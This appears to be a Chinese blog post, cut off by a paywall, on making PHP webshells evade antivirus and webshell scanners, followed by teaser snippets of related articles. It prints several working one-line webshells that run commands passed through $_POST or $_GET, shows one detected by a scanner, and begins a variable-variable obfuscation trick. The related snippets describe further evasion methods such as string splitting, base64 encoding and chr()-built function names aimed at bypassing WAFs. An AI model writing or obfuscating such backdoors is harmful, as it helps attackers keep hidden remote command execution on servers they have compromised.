PHP webshell 免杀方法

最新推荐文章于 2026-04-28 09:09:22 发布
原创 最新推荐文章于 2026-04-28 09:09:22 发布 · 4.1k 阅读 · 25
标签
#免杀 #web安全 #木马 #webshell

本文介绍php类webshell简单的免杀方法,总结不一定全面,仅供读者参考。

webshell通常可分为一句话木马,小马,大马,内存马。

一句话木马是最简单也是最常见的webshell形式,这种木马体积小,隐蔽较强,免杀相对容易;

小马是功能较为简单的Webshell,但比一句话木马稍复杂,可能会包含一个简单的文件管理界面或命令执行功能;

大马是功能全面的webshell,通常带有图形用户界面,提供文件管理、数据库操作、命令执行等多种功能,比如常用的蚁剑,冰蝎,哥斯拉等,大马由于功能复杂,在做免杀时一般需要将大马伪装成合法管理工具,分解成多个独立模块,分别加载,降低单点检测风险;

内存马是一种驻留在内存中的恶意代码,通常通过修改服务器进程的内存空间来执行,极难被发现和删除。与一般的webshell木马不同,内存马免杀一般需要采用内存隐藏,动态注入等方式,尽可能的隐藏恶意代码在内存中的存在,降低被持久发现的风险。

下面以一句话木马为例,通过几种一般的免杀方式对其进行免杀处理。

一句话木马

下面是常见的命令执行一句话木马:

<?php system($_POST['xxx']); ?>
<?php eval($_POST['xxx']); ?>
<?php echo shell_exec($_POST['xxx']); ?>
<?php assert($_POST['xxx']); ?>

在做免杀的时候,不仅需要避免木马被杀毒软件和安全工具检测到,同时还需要保证木马功能正常运行。

在 windows10/11 虚拟机上利用 phpstudy 搭建一个本地网站,本实验木马放在网站下的 free-kill 目录中。编写好原始的一句话木马命名为 test0.php 

<?php echo shell_exec($_GET['xxx']); ?>

执行 echo hack 命令验证功能:

 使用河马webshell查杀(SHELLPUB.COM在线查杀),可以轻易检测出来:

 可变变量绕过

一些安全检测机制会直接扫描代码中是否包含敏感函数调用,对此可以把敏感的函数名隐藏在可变变量中。下面通过把 shell_exec 隐藏到可变变量中实现:

<?ph
最低0.47元/天 解锁文章
攻防演练中PHP分析实战_afei00123
afei001
07-10 1370
在一次HVV行动中,在某天眼设备上发现红队在尝试通过命令执行下载了一个可疑的txt文件。该文件经分析是一个不错的PHP
WebShell
热门推荐
高飞的博客
03-06 15万+
webshell
记录一个php webshell demo
最新发布
蚁景网安学院
04-28 521
分支对抗简单来说就是利用了增大程序控制分支的复杂度来使得绕过检测引擎,那么我们还有其他的改变程序控制流的思路不?此处我用了两种方法混合在一起实现
过D盾php webshell探讨
goddemon
07-19 1995
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结在这个过程中发觉了其实webshell的bypass手法还是蛮多的后缀bypass总结完了经过实战也绕过了很多家最新的waf后缀内容的还没写完东西有点多这里就分享一些php全过的也有贼多但是暂时就不分享了。......
php一句话木马
qq_58683895的博客
11-21 3005
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成
记一次多平台PHP木马的制作过程
icewolf00的博客
01-20 3267
最开始萌生出写WebShell的想法是这个月初上网时,偶然看到了阿里安全应急响应平台的一则线上活动“第三届伏魔恶意代码挑战赛”的报名公告,大致看了一下之后发现该比赛的内容为编写PHPJSPPython或Bash语言的后门代码,若编写的代码通过了阿里最新一代检测引擎(即挑战靶场)的检测,并且不和别的师傅重复之后就算比赛通过了。鉴于我对PHP语言和网络安全方面较为了解,于是我就抱着试一试的心态报名了PHP赛道。在奋战了4天之后,我编写出了一个215。
这你敢信,复习php意外搞出一个webshell
YJ_12340的博客
07-01 763
正当我饶有兴致的开始复习 PHP 开发这个课程准备一天速通期末考试的时候,没想到有心栽花花不开,无心插柳柳成荫,意外灵感突发,搞出了一个还算可以的webshell,下面讲讲思路
Webshell
seoppg的博客
08-12 940
本文探讨了PHP一句话木马技术,通过多种函数变形绕过WAF检测。重点介绍了使用str_rot13、array_map、preg_replace等函数进行代码混淆的方法,以及将大源码base64加密的思路。文章展示了多个绕过安全狗和D盾的代码示例,包括类封装、字符串分割、数组操作等技术手段,并提供了的实现方案。这些技术通过分解敏感函数、加密关键代码等方式,有效规避了常规安全检测。最后分享了相关GitHub资源,为安全研究人员提供参考。
PHP webshell 姿势总结
seoppg的博客
08-12 1115
PHP 有很多经典的姿势可以总结学习,不知道以前国光我在干啥,这个实际上早就该掌握的知识了,果然是 “逆水行舟,不进则退” 啊。
这你敢信,复习PHP意外搞出一个WebShell
蚁景网安学院
07-01 1074
正当我饶有兴致的开始复习 PHP 开发这个课程,准备一天速通期末考试的时候,没想到有心栽花花不开,无心插柳柳成荫,意外灵感突发,搞出了一个还算可以的WebShell,下面讲讲思路。
PHP从零学习到Webshell手册
渗透测试研究中心
05-09 1515
首先,要知己知彼,才能针对性做出策略来使得WebShell成功$a){$tmp = "";$a = $a/10;//sysTem(高危函数)同样,可以配合文件名玩出一些花活,我们建一个PHP名字为976534.php$a){$tmp = "";$a = $a/10;//sysTem(高危函数)//__FILE__为976534.php//substr(__FILE__, -10, 6)即从文件名中提取出976534。
PHP一句话木马学习
qq_45780190的博客
05-11 3868
PHP一句话木马学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
关于PHPwebshell小结
小王的储物间
02-23 1054
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到的目的!由于在PHP函数中函数名、方法名、类名不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了效果!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
php webshell初探
qq_57861415的博客
02-07 836
前段时间上班无聊,刷公众号偶然发现一篇“”的文章,突然来了兴趣研究研究,找了曾哥的来看。自己做了几个样本,效果测试还不错,就放出来和大家交流,感觉基本够用。截止2月6日。
PHP方法
wutiangui的博客
06-07 1048
/ 函数变形 assert 达到毒软件识别)的效果:如。//将eval变形为evee。函数从字符串的两端删除空白字符和其他预定义字符。函数把字符串中每个单词的首字符转换为大写。函数把字符串的一部分替换为另一个字符串。函数把字符串中的首字符转换为大写。函数把字符串分割为更小的字符串。函数转换字符串中特定的字符。函数返回字符串的一部分。函数把字符串转换为大写。函数把字符串转换为小写。
学习——PHP
ZxC789456302的博客
10-23 2013
php,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
webshell之函数与变量玩法
seoppg的博客
08-12 862
本文探讨了利用PHP函数和变量特性实现的几种方法:1. 动态函数调用:通过变量间接调用危险函数(如system);2. 回调函数应用:使用forward_static_call_array等函数间接执行代码;3. 魔术方法利用:通过构造函数和析构函数特征绕过检测;4. 可变变量特性:通过多层变量引用隐藏关键操作。文章还展示了改造冰蝎3.0木马的实践案例,通过拆分关键字、修改默认密钥等方式成功实现。结果表明,简单的结构改造和函数替换比复杂的变形编码更能有效绕过检测。
php webshell基础
dig2pen的博客
12-03 1405
PHP WebShell基础:通过编码混淆和函数特性绕过检测。文章分析了静态/动态查机制,指出利用PHP语言特性混淆高危函数和参数是关键。介绍了三种编码方式:1) ASCII编码通过字符运算拼接函数名;2) Base64利用解码特性忽略非法字符;3) Gzip压缩配合Base64加密静态代码。特别强调eval()和assert()在PHP7+版本中的限制,需直接明文使用。提供了具体代码示例,如通过chr()运算生成system函数名,以及利用base64_decode()的容错特性解析被干扰的字符串。
php-webshell
seoppg的博客
08-12 703
本文介绍了一种PHP webshell技术,通过变量覆盖、注释混淆、spl_autoload函数和反序列化回调等功能实现隐蔽执行。作者利用base64编码、URL编码和cookie传参来隐藏关键参数,通过file_put_contents写入恶意inc文件,再配合变量覆盖和动态函数调用执行命令。文章详细讲解了代码混淆方法和请求构造过程,并提供了适配蚁剑连接的修改方案。最后给出了项目地址供参考。该方法通过多重混淆和编码手段提高了webshell的隐蔽性,但作者也提醒使用后应删除inc文件避被发现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值